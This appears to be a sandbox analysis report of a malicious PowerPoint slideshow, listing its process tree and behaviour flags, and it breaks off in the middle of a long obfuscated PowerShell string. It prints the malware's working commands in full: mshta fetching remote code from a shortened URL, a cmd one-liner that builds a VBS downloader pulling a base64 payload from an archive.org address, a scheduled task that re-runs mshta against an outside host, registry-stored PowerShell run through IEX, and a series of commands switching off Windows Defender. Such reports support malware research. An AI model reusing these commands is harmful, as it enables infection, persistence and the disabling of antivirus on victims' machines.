PID 1332 wrote to memory of 2036	1332	MsHTa.exe	taskkill.exe
PID 1332 wrote to memory of 2036	1332	MsHTa.exe	taskkill.exe
PID 1332 wrote to memory of 2036	1332	MsHTa.exe	taskkill.exe
PID 1332 wrote to memory of 1572	1332	MsHTa.exe	taskkill.exe
PID 1332 wrote to memory of 1572	1332	MsHTa.exe	taskkill.exe
PID 1332 wrote to memory of 1572	1332	MsHTa.exe	taskkill.exe
PID 1332 wrote to memory of 1572	1332	MsHTa.exe	taskkill.exe
PID 2016 wrote to memory of 1812	2016	cmd.exe	WScript.exe
PID 2016 wrote to memory of 1812	2016	cmd.exe	WScript.exe
PID 2016 wrote to memory of 1812	2016	cmd.exe	WScript.exe
PID 2016 wrote to memory of 1812	2016	cmd.exe	WScript.exe
PID 1812 wrote to memory of 2252	1812	WScript.exe	WScript.exe
PID 1812 wrote to memory of 2252	1812	WScript.exe	WScript.exe
PID 1812 wrote to memory of 2252	1812	WScript.exe	WScript.exe
PID 1812 wrote to memory of 2252	1812	WScript.exe	WScript.exe
PID 2252 wrote to memory of 2324	2252	WScript.exe	WScript.exe
PID 2252 wrote to memory of 2324	2252	WScript.exe	WScript.exe
PID 2252 wrote to memory of 2324	2252	WScript.exe	WScript.exe
PID 2252 wrote to memory of 2324	2252	WScript.exe	WScript.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6.pps"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:292

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1976

C:\Windows\SysWOW64\MsHTa.exe
MsHTa HTTp://j.mp/asdimawxiwmawidwwdkiiwnawij
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
3⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
4⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\SysWOW64\WScript.exe" "C:\Users\Public\bin.vbs" /elevate
6⤵
PID:2324

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/277.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
PID:2424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
PID:2608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SubmitSamplesConsent 2
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
PID:2684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -MAPSReporting 0
1⤵
- Process spawned unexpected child process
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
1⤵
- Process spawned unexpected child process
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:2864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:2956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**47**$**56**$**35**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**37**$**c6**$**16**$**66**$**42**$**a3**$**d6**$**27**$**96**$**66**$**e6**$**f6**$**34**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**07**$**f6**$**47**$**35**$**a0**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**f6**$**47**$**02**$**47**$**96**$**02**$**47**$**56**$**37**$**02**$**46**$**e6**$**16**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**37**$**02**$**56**$**86**$**47**$**02**$**07**$**f6**$**47**$**37**$**02**$**32**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**46**$**27**$**f6**$**75**$**44**$**02**$**56**$**07**$**97**$**45**$**d2**$**02**$**13**$**02**$**56**$**57**$**c6**$**16**$**65**$**d2**$**02**$**22**$**56**$**27**$**16**$**77**$**97**$**07**$**35**$**96**$**47**$**e6**$**14**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**22**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**97**$**47**$**27**$**56**$**07**$**f6**$**27**$**05**$**d6**$**56**$**47**$**94**$**d2**$**47**$**56**$**35**$**a0**$**d7**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**d6**$**56**$**47**$**94**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**d6**$**56**$**47**$**94**$**d2**$**77**$**56**$**e4**$**02**$**02**$**02**$**02**$**a0**$**b7**$**02**$**92**$**92**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**86**$**47**$**16**$**05**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**47**$**37**$**56**$**45**$**82**$**12**$**82**$**02**$**66**$**96**$**a0**$**22**$**27**$**56**$**46**$**e6**$**56**$**66**$**56**$**44**$**02**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**56**$**96**$**36**$**96**$**c6**$**f6**$**05**$**c5**$**54**$**25**$**14**$**75**$**45**$**64**$**f4**$**35**$**c5**$**a3**$**d4**$**c4**$**b4**$**84**$**22**$**02**$**d3**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**a0**$**a0**$**46**$**e6**$**56**$**35**$**27**$**56**$**67**$**56**$**e4**$**02**$**47**$**e6**$**56**$**37**$**e6**$**f6**$**34**$**37**$**56**$**c6**$**07**$**d6**$**16**$**35**$**47**$**96**$**d6**$**26**$**57**$**35**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**76**$**e6**$**96**$**47**$**27**$**f6**$**07**$**56**$**25**$**35**$**05**$**14**$**d4**$**d2**$**02**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**46**$**f6**$**d4**$**47**$**96**$**46**$**57**$**14**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**b6**$**27**$**f6**$**77**$**47**$**56**$**e4**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**37**$**37**$**56**$**36**$**36**$**14**$**27**$**56**$**46**$**c6**$**f6**$**64**$**46**$**56**$**c6**$**c6**$**f6**$**27**$**47**$**e6**$**f6**$**34**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**e6**$**e6**$**16**$**36**$**35**$**47**$**07**$**96**$**27**$**36**$**35**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**27**$**f6**$**47**$**96**$**e6**$**f6**$**d4**$**56**$**d6**$**96**$**47**$**c6**$**16**$**56**$**25**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**65**$**14**$**f4**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**d6**$**56**$**47**$**37**$**97**$**35**$**e6**$**f6**$**96**$**47**$**e6**$**56**$**67**$**56**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**27**$**47**$**e6**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**35**$**a0**$**a0**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**74**$**02**$**d3**$**02**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**a0**$**22**$**a3**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**27**$**57**$**f6**$**95**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**22**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**86**$**47**$**16**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**02**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**a0**$**a0**$**a0**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**37**$**f6**$**86**$**e6**$**f6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**16**$**47**$**86**$**37**$**d6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**c6**$**56**$**86**$**37**$**27**$**56**$**77**$**f6**$**07**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**c6**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**a6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**96**$**47**$**55**$**c6**$**c6**$**16**$**47**$**37**$**e6**$**94**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**d6**$**37**$**16**$**c6**$**96**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**37**$**56**$**27**$**47**$**67**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**f6**$**05**$**37**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**37**$**27**$**56**$**37**$**77**$**f6**$**27**$**26**$**76**$**56**$**27**$**f5**$**47**$**56**$**e6**$**07**$**37**$**16**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**c6**$**96**$**07**$**d6**$**f6**$**36**$**f5**$**47**$**56**$**e6**$**07**$**37**$**16**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**27**$**f6**$**c6**$**07**$**87**$**54**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**c5**$**93**$**13**$**33**$**03**$**33**$**e2**$**03**$**e2**$**43**$**67**$**c5**$**b6**$**27**$**f6**$**77**$**56**$**d6**$**16**$**27**$**64**$**c5**$**45**$**54**$**e4**$**e2**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**c5**$**73**$**23**$**73**$**03**$**53**$**e2**$**03**$**e2**$**23**$**67**$**c5**$**b6**$**27**$**f6**$**77**$**56**$**d6**$**16**$**27**$**64**$**c5**$**45**$**54**$**e4**$**e2**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**27**$**f6**$**c6**$**07**$**87**$**54**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**37**$**f6**$**86**$**e6**$**f6**$**36**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**16**$**47**$**86**$**37**$**d6**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**c6**$**56**$**86**$**37**$**27**$**56**$**77**$**f6**$**07**$**c5**$**03**$**e2**$**13**$**67**$**c5**$**c6**$**c6**$**56**$**86**$**35**$**27**$**56**$**77**$**f6**$**05**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**35**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$*